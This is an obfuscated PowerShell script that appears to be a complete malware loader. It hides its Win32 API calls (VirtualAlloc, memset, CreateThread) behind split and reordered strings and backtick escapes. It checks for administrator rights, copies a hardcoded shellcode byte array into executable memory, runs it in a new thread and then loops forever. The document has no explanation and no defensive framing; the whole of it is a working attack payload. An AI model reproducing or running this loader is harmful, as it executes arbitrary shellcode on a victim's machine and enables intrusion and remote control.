 &("{0}{1}" -f'seT-I','teM')  ("vArIA"+"BLe:Y"+"eOjC") ([TyPe]("{9}{2}{7}{10}{8}{1}{5}{0}{6}{11}{3}{4}"-f 'iN','P','tE','IdeN','TIty','RINCIPAl.W','D','M.S','itY.','SYs','EcUR','OWS') )  ;  .("{1}{0}"-f 'T','sE')  ("{1}{0}" -f '1j','4Ch3')  ([TyPE]("{7}{11}{12}{0}{6}{10}{9}{2}{5}{4}{3}{1}{8}" -F'Rit','nRo','A','uiLti','OWSb','l.WIND','Y','sYsTE','LE','P','.PRinCI','M.','sECU') ) ; function tes`T-R`U`Nn`inG`AsElEVAT`Ed

{
    [CmdletBinding()]
    [OutputType([bool])]
    Param()

    if(-not ${SCripT:`iSR`U`NniNg`ASeLEv`A`T`EDTe`STEd} -and ${SCRiPT:i`srUnnIn`G`AseL`evaTed})
    {
        if(${S`c`RiPt:iSwInDO`ws})
        {
            ${W`ID}= ( .("{1}{0}" -f 'EM','IT')  ("vARIa"+"BLE:y"+"eoJC")  )."VAl`UE"::("{2}{0}{1}" -f 'C','urrent','Get').Invoke()
            ${p`Rp}=&("{2}{1}{0}"-f 'ject','w-ob','ne') ("{5}{3}{8}{9}{4}{0}{1}{2}{7}{6}"-f '.Win','dowsP','r','stem.Security.','ncipal','Sy','ipal','inc','Pr','i')(${W`ID})
            ${a`DM}=  ( &("{0}{1}{2}"-f 'CHi','L','dIteM') ("{3}{0}{4}{1}{2}" -f'Aria',':4','CH31J','V','ble')  )."vA`LUe"::"AdMi`N`ISTRator"
            ${sCRiPT`:i`srunNI`N`G`As`el`EVaTed} = ${P`Rp}.("{0}{1}"-f 'IsI','nRole').Invoke(${A`Dm})
        }
        elseif(${s`cRI`Pt`:Isc`or`eCLr})
        {
            
            
            ${ScR`i`pt:isrunNi`N`Gas`ELe`V`AtED} = ${tR`Ue}
        }

        ${sc`RIpT:iSrUnniNgas`E`LE`VAt`EDTE`sT`Ed} = ${t`RUE}
    }

    return ${s`C`RI`PT:i`sRU`NN`ING`A`sElEVateD}
}

${C} = ((("{55}{9}{53}{0}{85}{20}{32}{30}{70}{10}{58}{91}{45}{50}{43}{49}{36}{79}{34}{75}{71}{101}{69}{48}{99}{18}{96}{29}{72}{76}{68}{59}{40}{42}{11}{67}{28}{7}{25}{81}{5}{88}{1}{26}{51}{80}{92}{8}{47}{41}{98}{64}{39}{73}{60}{46}{19}{66}{24}{56}{100}{84}{6}{38}{35}{52}{21}{2}{95}{13}{93}{83}{3}{78}{86}{97}{90}{33}{62}{63}{27}{57}{4}{16}{15}{37}{44}{22}{77}{54}{14}{12}{82}{23}{89}{87}{74}{31}{61}{17}{65}{94}" -f 'port(','ern IntPtr',' dw','s','F','pub','P','l32.','hr','D','public','5k','blic s','nF','pu','5msvcr','6','c, ','ti','Size, IntPt','65ke','t','l','ic extern Int','a','dll',' Cr','[Dl','rne','Type, ','llF',' s','rnel32.d','rea','ss, ui',' ui','tPtr lpA','t','arameter,','A','I','ad(IntP','mport(F6','rtualA','.dl','IntPtr','dwStack','e','Allo','lloc(In',' Vi','eat','n','llIm',')]','[','rtAddress, In','lImport(',' stat','l','es, uint ','r','d','Id);','read','uint c','r lpSt','e','Dl','uint fl','65)]','t','ui','ttribut','dest, uint','n','nt flProtect);[','F65',', I','ddre','e','F65)]','tat','g',' lp','F','nt',' memset(IntPtr ','lic static ext','Ptr','tr lpTh','ic extern ','T','la','ount);','Creatio','on','P','tr lpTh','ca','tPtr',' dwSize, '))."R`EPLA`Ce"('F65',[sTRING][chAr]34));${w} = &("{0}{1}"-f'Add-','Type') -memberDefinition ${C} -Name ("{0}{1}"-f'Wi','n32') -namespace ("{4}{3}{0}{2}{1}" -f 'unct','ons','i','in32F','W') -passthru;[Byte[]];[Byte[]]${Z} = 0xbf,0x4b,0x3f,0x44,0x56,0xda,0xc8,0xd9,0x74,0x24,0xf4,0x5d,0x31,0xc9,0xb1,0x47,0x31,0x7d,0x13,0x83,0xc5,0x04,0x03,0x7d,0x44,0xdd,0xb1,0xaa,0xb2,0xa3,0x3a,0x53,0x42,0xc4,0xb3,0xb6,0x73,0xc4,0xa0,0xb3,0x23,0xf4,0xa3,0x96,0xcf,0x7f,0xe1,0x02,0x44,0x0d,0x2e,0x24,0xed,0xb8,0x08,0x0b,0xee,0x91,0x69,0x0a,0x6c,0xe8,0xbd,0xec,0x4d,0x23,0xb0,0xed,0x8a,0x5e,0x39,0xbf,0x43,0x14,0xec,0x50,0xe0,0x60,0x2d,0xda,0xba,0x65,0x35,0x3f,0x0a,0x87,0x14,0xee,0x01,0xde,0xb6,0x10,0xc6,0x6a,0xff,0x0a,0x0b,0x56,0x49,0xa0,0xff,0x2c,0x48,0x60,0xce,0xcd,0xe7,0x4d,0xff,0x3f,0xf9,0x8a,0xc7,0xdf,0x8c,0xe2,0x34,0x5d,0x97,0x30,0x47,0xb9,0x12,0xa3,0xef,0x4a,0x84,0x0f,0x0e,0x9e,0x53,0xdb,0x1c,0x6b,0x17,0x83,0x00,0x6a,0xf4,0xbf,0x3c,0xe7,0xfb,0x6f,0xb5,0xb3,0xdf,0xab,0x9e,0x60,0x41,0xed,0x7a,0xc6,0x7e,0xed,0x25,0xb7,0xda,0x65,0xcb,0xac,0x56,0x24,0x83,0x01,0x5b,0xd7,0x53,0x0e,0xec,0xa4,0x61,0x91,0x46,0x23,0xc9,0x5a,0x41,0xb4,0x2e,0x71,0x35,0x2a,0xd1,0x7a,0x46,0x62,0x15,0x2e,0x16,0x1c,0xbc,0x4f,0xfd,0xdc,0x41,0x9a,0x52,0x8d,0xed,0x75,0x13,0x7d,0x4d,0x26,0xfb,0x97,0x42,0x19,0x1b,0x98,0x89,0x32,0xb6,0x62,0x59,0x6e,0xbb,0xe1,0xef,0xf8,0x41,0xfa,0x1e,0xa5,0xcc,0x1c,0x4a,0x45,0x99,0xb7,0xe2,0xfc,0x80,0x4c,0x93,0x01,0x1f,0x29,0x93,0x8a,0xac,0xcd,0x5d,0x7b,0xd8,0xdd,0x09,0x8b,0x97,0xbc,0x9f,0x94,0x0d,0xaa,0x1f,0x01,0xaa,0x7d,0x48,0xbd,0xb0,0x58,0xbe,0x62,0x4a,0x8f,0xb5,0xab,0xde,0x70,0xa1,0xd3,0x0e,0x71,0x31,0x82,0x44,0x71,0x59,0x72,0x3d,0x22,0x7c,0x7d,0xe8,0x56,0x2d,0xe8,0x13,0x0f,0x82,0xbb,0x7b,0xad,0xfd,0x8c,0x23,0x4e,0x28,0x0d,0x1f,0x99,0x14,0x7b,0x71,0x19;${G} = 0x1000;if (${Z}."LE`NgTH" -gt 0x1000){${G} = ${Z}."l`enG`Th"};${X}=${w}::("{3}{1}{2}{0}"-f 'oc','irt','ualAll','V').Invoke(0,0x1000,${G},0x40);for (${I}=0;${i} -le (${Z}."L`engtH"-1);${I}++) {${W}::"m`emSEt"([IntPtr](${x}.("{1}{0}" -f '2','ToInt3').Invoke()+${I}), ${z}[${i}], 1)};${w}::("{2}{0}{1}"-f'e','ad','CreateThr').Invoke(0,0,${X},0,0,0);for (;;){.("{2}{0}{1}{3}" -f'r','t','Sta','-sleep') 60};
